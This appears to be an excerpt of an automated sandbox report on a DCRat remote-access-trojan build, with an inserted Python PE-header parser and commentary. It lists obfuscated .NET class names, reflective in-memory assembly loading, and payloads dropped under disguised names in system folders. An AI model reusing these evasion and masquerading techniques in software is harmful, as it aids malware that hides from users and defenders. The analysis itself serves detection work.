            Source: DCRatBuild.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb | source: DCRatBuild.exe
            Source: DCRatBuild.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DCRatBuild.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DCRatBuild.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DCRatBuild.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DCRatBuild.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
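Every static PE fact listed above (which data directories are populated, the DllCharacteristics flags, and the section each directory lands in) comes straight from the PE headers. The Python below is an added example, not code from Joe Sandbox: it builds a constructed, header-only PE32 image in memory (no section contents, so it cannot be executed), then decodes DllCharacteristics into the same flag names the report prints and maps each populated data directory RVA to the section that contains it, which is what the "IMAGE_DIRECTORY_ENTRY_X is in: .rdata" lines express. The section layout and directory RVAs in the sample are my own values, chosen to mirror the report's placement.

```python
"""Recover the static PE facts above from the headers alone.

Added example, not part of the report or of Joe Sandbox. The sample image
is constructed: DOS stub, COFF header, PE32 optional header, 16 data
directories and four section headers, with no section data behind them.
"""
import struct

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
    "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]


def build_sample_pe() -> bytes:
    """Constructed PE32 headers: import, IAT, debug and load config in .rdata,
    resources in .rsrc, relocations in .reloc (my layout, not DCRatBuild.exe's)."""
    sections = [(b".text", 0x1000), (b".rdata", 0x2000), (b".rsrc", 0x3000), (b".reloc", 0x4000)]
    dirs = {1: (0x2100, 0x50), 2: (0x3000, 0x200), 5: (0x4000, 0x100),
            6: (0x2300, 0x1C), 10: (0x2400, 0xA0), 12: (0x2000, 0x40)}
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 96 + 16 * 8, 0x0102)
    opt = struct.pack(
        "<HBB9I6H4I2H6I",
        0x10B, 14, 0,                                   # PE32 magic, linker version
        0x1000, 0x3000, 0, 0x1000, 0x1000, 0x2000,      # code/data sizes, entry point, bases
        0x400000, 0x1000, 0x200,                        # image base, section and file alignment
        6, 0, 0, 0, 6, 0,                               # OS, image and subsystem versions
        0, 0x5000, 0x400, 0,                            # Win32 version, SizeOfImage, SizeOfHeaders, checksum
        2, 0x0040 | 0x0100 | 0x4000 | 0x8000,           # GUI subsystem; DllCharacteristics as in the report
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16,      # stack/heap sizes, loader flags, directory count
    )
    dirs_blob = b"".join(struct.pack("<II", *dirs.get(i, (0, 0))) for i in range(16))
    sec_blob = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, va, 0x1000, 0x400 + 0x200 * i, 0, 0, 0, 0, 0x40000040)
        for i, (name, va) in enumerate(sections)
    )
    return dos + b"PE\0\0" + coff + opt + dirs_blob + sec_blob


def _section_for_rva(sections, rva):
    for name, va, size in sections:
        if va <= rva < va + size:
            return name
    return None


def parse_pe_headers(data: bytes) -> dict:
    """Decode the DOS, COFF and optional headers; handles PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:
        ndirs_off, dirs_off = 92, 96
    elif magic == 0x20B:
        ndirs_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]

    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, max(vsize, rawsize)))

    directories = {}
    for i in range(min(ndirs, 16)):
        rva, size = struct.unpack_from("<II", data, opt + dirs_off + 8 * i)
        if rva or size:
            directories[DIRECTORY_NAMES[i]] = (rva, size, _section_for_rva(sections, rva))

    return {
        "magic": magic,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "sections": [s[0] for s in sections],
        "directories": directories,
    }


def missing_mitigations(info: dict) -> list:
    """Hardening flags a current linker sets by default that are absent."""
    wanted = ["DYNAMIC_BASE", "NX_COMPAT", "GUARD_CF"]
    if info["magic"] == 0x20B:
        wanted.append("HIGH_ENTROPY_VA")
    return [f for f in wanted if f not in info["dll_characteristics"]]


if __name__ == "__main__":
    info = parse_pe_headers(build_sample_pe())
    print("DllCharacteristics:", ", ".join(info["dll_characteristics"]))
    for name, (rva, size, section) in info["directories"].items():
        print(f"IMAGE_DIRECTORY_ENTRY_{name} rva={rva:#x} size={size:#x} is in: {section}")
    print("missing mitigations:", missing_mitigations(info) or "none")
```

Read the result with the caveat the report itself implies: the flags on DCRatBuild.exe describe the WinRAR SFX stub (the sfxrar.pdb path above is the CodeView record that the DEBUG directory points at), so ASLR, DEP and CFG being enabled on the wrapper says nothing about the .NET payload it extracts, which is what the rest of the report is about. Replace build_sample_pe() with open(path, "rb").read() to run the same decoding against a real file.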

            Data Obfuscation

            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs | .Net Code: aPPfxPHqYN System.AppDomain.Load(byte[])
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs | .Net Code: aPPfxPHqYN System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs | .Net Code: aPPfxPHqYN
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs | .Net Code: aPPfxPHqYN System.AppDomain.Load(byte[])
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs | .Net Code: aPPfxPHqYN System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, LmSC3EI6jv3Pr2T55hN.cs | .Net Code: aPPfxPHqYN
            Source: C:\Users\user\Desktop\DCRatBuild.exe | File created: C:\ChainBlocksurrogateagentFont\__tmp_rar_sfx_access_check_4418718
            Source: DCRatBuild.exe | Static PE information: section name: .didat
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7E28C push eax; ret 0_2_00D7E2AA
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7ED46 push ecx; ret 0_2_00D7ED59
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD344700BD pushad ; iretd 6_2_00007FFD344700C1
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD3447798D pushfd ; ret 6_2_00007FFD34477993
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD34472B82 pushad ; retf 6_2_00007FFD34472C01
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD34472C02 pushad ; retf 6_2_00007FFD34472C01
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344800BD pushad ; iretd 20_2_00007FFD344800C1
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34482B82 pushad ; retf 20_2_00007FFD34482C01
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34482C02 pushad ; retf 20_2_00007FFD34482C01
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Code function: 23_2_00007FFD344900BD pushad ; iretd 23_2_00007FFD344900C1
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Code function: 23_2_00007FFD3449798D pushfd ; ret 23_2_00007FFD34497993
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Code function: 23_2_00007FFD34492B83 pushad ; retf 23_2_00007FFD34492C01
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Code function: 23_2_00007FFD34492C03 pushad ; retf 23_2_00007FFD34492C01
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 24_2_00007FFD344600BD pushad ; iretd 24_2_00007FFD344600C1
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 24_2_00007FFD3446798D pushfd ; ret 24_2_00007FFD34467993
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 24_2_00007FFD34462B82 pushad ; retf 24_2_00007FFD34462C01
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 24_2_00007FFD34462C02 pushad ; retf 24_2_00007FFD34462C01
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD344800BD pushad ; iretd 26_2_00007FFD344800C1
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD3448798D pushfd ; ret 26_2_00007FFD34487993
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD34482B82 pushad ; retf 26_2_00007FFD34482C01
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD34482C02 pushad ; retf 26_2_00007FFD34482C01
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, mkaNOOiu1fppM1vEm4.cs | High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'bidWPMi9hXRfwjqNkCq', 'TXgkN6iGyDJRRpiNVn5', 'oV2lDEix48WWBv9fcRJ', 'UYrfcZifyw8SDtbcMRW', 'urvSTri6ZY3GR2oUK32', 'K7sRioitZQXbg1K46Ca'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, oHNXMy1NgHLvYQhmElK.cs | High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'dNs5F6xHKHCtiaLhLfn', 'pAwCdQxAugGUfZd5YQ5', 'qsnI8pxVjymRDlAiZmv', 'VrKHBcxqHqZYSjbeIVe', 'bS3itpxID1gdqQUatLj', 'kexs3oxioG7rAfjLqsu'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, vdX4HB0KTgOBXGur3Q.cs | High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'TTjEbltxJ', 'Bv4KnnVvvGZkXdyNeBX', 'EhUFkgVEJQEkOL0VLv4', 'KlCdWOVe57mrCqBIikp', 'hAkBJXVLPaFQUvRvSRY', 'lifF9CVuFp2vlI206d8'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, KcJDbFfC3DNhp6PdPG9.cs | High entropy of concatenated method names: 'oYo', '_1Z5', 'BLrMXRm9C0', 'OBZsQGEEX2', 'lndMyH3yZP', 'X2STQL8Y17QLJM1a4c3', 'jBM5Ux8JgHRdO8G1aof', 'DVI0mA8MQCix27Keq5N', 'AoIGcm8jKZKIEigMEys', 'cYg5th80Sm4pkxCUNvu'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, sa2LD81iN9jvbHnyqYo.cs | High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'xBU2lQtPINJBcunG4YK', 'W6w6NXtDSCZc6NDthDn', 'KX1lIxtg9GueQYbvWh8', 'RDgiogt8HWJbIoxudhk', 'jJPAyBtnFQtCR6geHOG', 'm1LDM7t4pxOuQglIbDa'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, RjYdka8VUfxTCkuPy8.cs | High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'emS2v1irlXvaN6fingI', 'WxikmMi5QGkIRYdV72q', 'CHfgksis0bevLEhufKC', 'XB8ecrikZoBEnqXW2uE', 'VJavX7i2kvg3nqtLh5J', 'KXCPcdidu9awhPrh38Y'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, BtY0LefQ0AHEZt0pwhq.cs | High entropy of concatenated method names: 'ybfYhj1fgP', 'tEiYEnfwIJ', 'QmpYlFgfMF', 'vpYYqi6Dil', 'fmQYCwqwHm', 'M4gYdDuaRi', 'QShlwrZ7fXaD3NsyeaY', 'rL6QhZZFLCtEdmiS9Nk', 'l0ThxbZTNR0VtHCIjtl', 'yWiPsgZQi9eQWSr5CDT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CpUo31OI4nMA2NX4kN.cs | High entropy of concatenated method names: 'GQcGbZDqf', 'FK9Bc3yZM', 'lH874u8WT', 'rLcQMKAL2bQb8UeFM26', 'eQvjRnAE7QlhCe9fYpU', 'bHMpTPAecAATFnn5G2y', 'iFxZkOAukKpEvsmh2Yx', 'ma7ppTASUFlF8MWhE4i', 'TBvP8qAXCnWIL74ygOt', 'ex4BdrAo3J7uC6mNJyh'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ysPEmGnfkBKp6Pe80lF.cs | High entropy of concatenated method names: 'GRjF6sCgyZeI7SE6JSA', 'mwh88AC8FsABGpkOZqB', 'nr2PBYCN1aAWfKUBErB', 'Df1ToJCDWV4TOCX1dDe', 't1QtAAbjCQ', 'lQKxbaCNrpAjnir5sra', 'sVAhjXCFFqCe5k7yL1o', 'vILgqcCnYObjZjND2gL', 'uEnPpsC41TFC310SQFv', 'phkmfxCTsEW524Hp645'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, o2KOyQhJIjgo267adR.cs | High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'lR6fP7ItKXwlGyaZ9lc', 'vggRHXIcAR9qQJV2TfW', 'CX54IdIwlvAF0cUxZu2', 'OsCVTDIYTEgRIKeHZGM', 'jygidmIJ6Q087iGm3ap', 'kIkiZFIMWVDLXg69JwM'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, aC3Ov8QP2CxcBt18iNk.cs | High entropy of concatenated method names: 'kJSuBvVVKu', 'U2bu757y11', 'Y6SugwbFVm', 'zlHuXbvG6P', 'CZGuMXR79P', 'QfMdkZ4d3M58nqPHDJ2', 'kCNW174zPOJMxe0lnOj', 'Gvk7vE4kHdVRbqn0u6m', 'cJsVHk42pI5FCaPou45', 'T2SLm4NHpRIdh4db60O'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, TSCIaOIx0hjXyskiOq5.cs | High entropy of concatenated method names: 'BTdf9wDFtY', 'tAeJwxJq9X9sxWq8KKe', 'pHreMYJIkvgc4HRTieE', 'nNAUGTJAvrlW3m0D0yF', 'Wi2dcRJVBSeLYZrvcYH', 'aTKkkjJig1t7aLxGfnr', 'CRZCp0J9iataktcN8GI', 'wuDpcEJGts35NaGy0Hy', 'P5EClyJxwHfn33aHJgd', 'V7TV2VJf9EFDkahlwn5'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, SNXm4AfNO4hHNLDNgqm.cs | High entropy of concatenated method names: 'Q312oJfgSS', 'BPc2F80yES', 'h1n2WtY4VP', 'gso29kZC3O', 'X822vCxcBt', 'nTqTLTD9umBK5olGtMj', 'gJW8XiDGRjilqvu4Udk', 'vrcYbXDIbNOgvdNblqX', 'A9tUegDiTDlqaxiF56f', 'uewS4hDx4YgWyHIhm4f'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, glEcPYQ8T2A99AIlRUf.cs | High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, A3uninIyfN0hCy6qBF2.cs | High entropy of concatenated method names: 'baQf8M7axU', 'y3PfD0MIOf', 'nv8epcJZUH2dXIsESty', 'd8APL4JynNn8BqTvEvj', 'nhkS9gJP7R73rSLbuml', 'OTdjaOJDfbwqpwcTnTL', 'F6PJkoJgYijOCsJ5Wod', 'VHyY9lJ8WhvubGGVRdR', 'BeYok5JnT2RVSIG7DiV', 'rI0veKJ4BDfBEF9bLFt'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, aW2pwAnWLDFJi0UpVKV.cs | High entropy of concatenated method names: 'ToTRQhwWHH', 'rwLRnAItTJ', 'K7cRm22Jb4', 'aYHRYTfHSk', 'EsfR2O60eB', 'OAPR6d5CFP', 'uxmRsCZaO9', 'VLURayjhrt', 'NtlRulA98H', 'DcnRPZuDaF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, dpYdqsmwElxsgcqBAx7.cs | High entropy of concatenated method names: 'c7y3c9lS70', '_1kO', '_9v4', '_294', 'dj734u3MpN', 'euj', 'JnE3Ah6vAO', 'j8o3RyIFjD', 'o87', 'q9Z3OMHgsF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, jBCUvq1VlYREnO5m9Im.cs | High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'OAQHMdxnTfhS6UKsR6I', 'bSTJxDx4paN9qDsg31b', 'rj6IWYxNxO8k6F7DmMh', 'W410RqxF5lN5AuK5mNE', 'jOGaOHxTiwpIXZ1eQVV', 'nRYwGFx7B4JotmiPujP'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, OvSKO71awqCseY3EYhf.cs | High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'A1iOTcGZCdWHsqceUYG', 'BXQEQOGy5LnTc4jh4Sc', 'uVguPtGP6kfm3fdu3oo', 'mpCoSPGDd5fdATiqD6d', 'A5jE6CGg671QPYs3SpK', 'Q5c0RkG8WVRNH8d6SO9'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, p3tsfvIMgVWhQdF90Fr.cs | High entropy of concatenated method names: 'sjdm2vo2lM', 'E94m68SqGl', 'kKRgXeO5jRJ2kmmEyZU', 'kJkHNsOs71TQavoRt7v', 'Rk4u43Oan6Mih2wsTMP', 'qPGGryOr7Sk9awptDLT', 'p5GmyXlVTh', 'HqeYrABHW9wr2YlAIEi', 'RSNARBBAhwlGJnIRHid', 'UswXJXOdJjWg4YqbMdw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, suG3iw1ri6A9xseaA2N.cs | High entropy of concatenated method names: 'Xee1qoy5cR', 'wSLO2a6VEUuqOY4G3qw', 'ichAmb6qX8puZpxfIhg', 'mq0vIO6H15yXhn7e3tK', 'YuLjij6AfEu26DtUsij', 'h8RDkg6IIgTnT0ArO6V', 'oxIPue6ioB4Xv91maHn', 'ASYf4i69N4rvVK7Yyyn', 'anI1dt8oXN', 'XdmLBm6fCimSZoUpbIX'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, UsPvByz6Qq2KO8H1Wy.cs | High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Vs3IIT9qnJZowE7HO8T', 'BiWmhR9IASeHKPlRkgH', 'UrxNjt9iwmpxU3E0amu', 'k05mbV99Q3kli1KdnVs', 'o8ye1L9Gkb7snPQoCeq', 'RadlNo9xx2nisdDYLeY'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, JL2nwxn683rRYjWH3Ib.cs | High entropy of concatenated method names: 'V1QAtatDVA', 'hk7A5Eh0OC', 'Mt8J1QErDwiG5Du4xVn', 'Kfkkh9E5xsGTKiM4txq', 'IWMB22EshYNdMO4ea9g', 'IBRV1uEkNk5dRKmZffa', 'sVSL9IE2Ehtq4k1I2Cm', 'qK8XXhEdRy8OQGiyDwj', 'u8Ee4sEzaUG3nMOYiXQ', 'NvSoTCeHpORBQlabJ5p'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, JaAlfifpDrx5IUw2U78.cs | High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'RMIsakpWGE', 'luVMwGlBUa', 'TDVsuTgsSm', 'rC5MN3AuXb', 'xLUPWs8LacFdxcbF6sO', 'fKZHAH8uJP3WmgKrTfQ', 'hfhyqI8EpagNUInAe5U'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pqlU0xYC9WBKkseoZ1.cs | High entropy of concatenated method names: 'NU0exC9WB', 'Iy5bJIC8RfsnSkT1gF', 'YRt4qe3k8igRJEpLr6', 'Yrh0hmhcjkyC4hhZkY', 'exhYp9bAGjCKs0cLDC', 'ywo2mEvrqLJq0opI0h', 'DxZIxP4vE', 'q0efMdkkA', 'jbtQuORBn', 'JB8n5OUk9'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, Bgn2UD1g7350nNQAMGI.cs | High entropy of concatenated method names: 'Dub189IZUn', 'PMD3So6en8uENUqnlWi', 'lDmLHA6LoSZ59MrwsQW', 'lwaUQk6v0nqf6LHMWMp', 'JIlfw96EsnZG7SmkW5p', 'iIKWvl6u3PZpGH8JGqh', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nyPRrcQHsZGD5KYLPEA.cs | High entropy of concatenated method names: 'u6ne060nJ4', 'yMZeGKCCcn', 'AXmeBiHbIi', 'JbEe7yuWQo', 'x4VegvBGtt', 'ekS4JUFZYmaNUtnl19d', 'UZvAgxFOdUB1n87WQ65', 'vwcwG8FBY25HvdEFm75', 'u5ISWmFyTKU5DopN2pY', 'uGMvnTFPga48wsFaYD2'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, raqxiEBM8xrpHatTvQ.cs | High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'x2g5ZwV2EfmVK0cjEwg', 'M3xGf6VdEp65QIVDVE3', 'lovNksVzAXmEZQ1XlCX', 'tbP0xRqHQ7qQ6YtL8Ze', 'IfW0NrqAk8TB3xHH9in', 'KuRIDZqVibpr5PMl8op'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, zb2UlpFHkSTklRr5oa.cs | High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'imO1EIiTY9VlnKhhhpq', 'QnRjL7i7JZXsMHwJAiS', 'hSpGGhiQMS1o5JQ3bjG', 'X9icePi3q4JqSgxvJXl', 'B25tGZihiQiWliEVKCh', 'cwQjSwiCPEp0fYkyCXp'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, FCkR8EQFLB9yQhURlYe.cs | High entropy of concatenated method names: 'uSyx8VHl4g', 'xxpxGaZNR7', 'fC2xBrQJn8', 'wvNx7Qv40l', 'TM9xgWepfv', 'txPxX4VSZe', 'R3vxM2nVsA', 'XkMxSV8HNU', 'XNhxhK0Wyx', 'IckxE7C8TG'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, b0aIlr1lNKlfGdpiHL4.cs | High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'fQZRXst9mb8Cgr4sAHM', 'LZ39ZVtGyrpkp2QV2U9', 'O6sdk7txedbASwhMbAK', 'P7hqxOtfx8YH1HKJiaF', 'ynHXpMtIEhrBaNNNIi2', 'Dnv4y8tigWoUkiTNj9D'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, QwDFtY1pFu4gKbdC1aQ.cs | High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'OkigDFthGPcCPOkcRIc', 'HWgCvVtCwu2VRbBKxAW', 'So9yDmtbZEXua3SvkOF', 'hsccGPtvlMTqdMFfxd2', 'IgaJ5ttEd9mvVxyoEPZ', 'HeDok7te5Lh5nQH2KrN'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pgesf3fxl3jKT3XiUYg.cs | High entropy of concatenated method names: 'ksP2ELKdSt', 'r9y2l8b5ir', 'QPl2qsiWHl', 'HRH2C21JvU', 'brarpCPbG9xKcLP4XcL', 'U38adLPvIVwoAthQhcX', 'TfscWNPEGkRwwm7sj9c', 'AiopfiPhYGmNN4Ewsca', 'Mtoda0PCVNgsd3vhM19', 'mLIRRZPeKpjAMsEyMDy'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ES9VhuIIPWkEdSlAEcd.cs | High entropy of concatenated method names: 'cdXId6KXri', 'C09IimXDNc', 'mSsIwI8Dln', 'hQTIp0Jjim', 'I0xIoJKZrH', 'GAjIFrMLKt', 'p9DZTSwOerxcHm72ckb', 'eEWCBdwBk4Co9ksJBx2', 'r1I5qrwjAs8QqM0TfZS', 'qdPMdgw0aI4xx9n4vOw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, F4Aopy1FyJuFAfQL2hY.cs | High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'lA9cQltKMjDx8J9rFH9', 'w9gk8ctl1QmZGEb2hFE', 'nupsT8tUXSB3CVenfQn', 'OvWVVLta8MiVnJLLbj6', 'v88l4htroEdHxbSLrS4', 'E1ECdEt5JcBqZxcQwJF'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, WmXDNc1UxSsI8Dln6QT.cs | High entropy of concatenated method names: 'pQJ13Ijgo2', 'kNRj4rxO0TUX8dYVWTU', 'aJFwllxBPFkIdvMV9F6', 'JJ4LaIxjfZPQbZmhk2U', 'xZ8p3Tx0GVWZaMmkabP', 'xxikaZxZrf00HFEAM9D', 'kENb2jxyHY86BprDemH', 'JU9CtqxPgnDnV07Plsc', 'yWFLtZxDS4fPQbUEsD0', 'f28'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, TDM4eGnvylMYY0i1iZl.cs | High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'cK9R4uClV7', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | High entropy of concatenated method names: 'Icmbxi1N5VAD1FA9FEX', 'cOPJtg1FF6AgyNnn0U0', 'eOSU7I1nD4k5F0Upwe7', 'z04hWk14PsEsauJ3Z5H', 'x8gJxBASGU', 'MqqprI1QtBWpqGrh5DW', 'pewtrh13NfJNfT82Ew2', 'cECWjO1hKOjXrWvd3yf', 'zdrBUs1CUIg3jDqxxNQ', 'wpb10h1b3T616tJ2R9j'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ecCseonHGRAM7nMCQuY.cs | High entropy of concatenated method names: 'E5rAXNBINo', 'X7mAM7RjJe', 'bJtASk8fik', 'KDFAhXr5dS', 'yqiAEVL7U7', 'RxpZx4eTmVaKKkHOAwn', 'y1ho8ceNvrm6UumrUXV', 'g5WZZqeF9231lJ5jdMo', 'dDRPYVe7sqT2LKxciNL', 'nkl36teQDkaUOASc4qE'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, VbYre3ItnDaBentHBJ1.cs | High entropy of concatenated method names: 'MVqQeooD7o', 'MAXQxIUo6h', 'egVHYXMntKf2hAbhLbQ', 'b03CgZM4Oq8c57tJy5e', 'dBYWCZMgTvmGcwJcwEY', 'pmlJ1JM8B5d6T3srd01', 'TlAFoLMNnl9Z9OEGlNp', 'LF65UFMFQw4yl6VH9Hg', 'HPOae1MT7mBtxLFAOLA', 'kQ9yODM7NXyHvCjl5BS'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, vLWq6a1fkX3BiEZNZmC.cs | High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'IU3f6o9QiNFDqtUChon', 'polnQO93B5NogEqr6qn', 'xOqQ2D9hdZycQXBVFiJ', 'iOKsDW9CliptaGPRfnn', 'WVuPHY9b5IhGLnPSqey', 'D63VP59vm7AuO3DoYY4'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lKZw0slmlIFpBCgcl8.cs | High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'qIyhlFIOgkVn665MPMF', 'hJ7duqIBxpF5j9kWvxu', 'AwsHGhIZXNhiZIgt5nX', 'XwPjaxIyLw8DbIBaRBa', 'tMZwSDIPNoHKHGAeLKb', 'tGvI8TIDhRLeMBG45kP'
